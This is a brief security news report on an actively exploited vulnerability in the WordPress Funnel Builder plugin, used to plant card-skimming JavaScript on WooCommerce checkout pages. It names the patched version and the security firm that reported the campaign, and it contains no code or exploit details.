A serious security flaw in the WordPress Funnel Builder plugin is being actively exploited in the wild. Attackers are injecting malicious JavaScript into WooCommerce checkout pages to steal customers’ payment information. Sansec published details of the campaign this week. This vulnerability does not yet have an official CVE ID assigned. It impacts all plugin versions prior to 3.15.0.3. It’s utilized by over 40,000 WooCommerce stores. According to the Dutch e-commerce security firm, the vulnerability enables unauthenticated attackers to insert arbitrary JavaScript code onto every checkout page of the affected store. FunnelKit, the company behind Funnel Builder, has issued a security patch for the vulnerability in version 3.15. 0.3.. „Attackers are injecting counterfeit Google Tag Manager scripts via the plugin’s ‚External Scripts‘ configuration,“ it noted. The injected script blends in with the store’s legitimate analytics tags, but secretly loads a payment skimmer that steals credit card numbers, CVVs, and billing addresses during checkout. According to Sansec, Funnel Builder exposes a checkout endpoint that lets any incoming request select which internal method to execute.
The Hacker News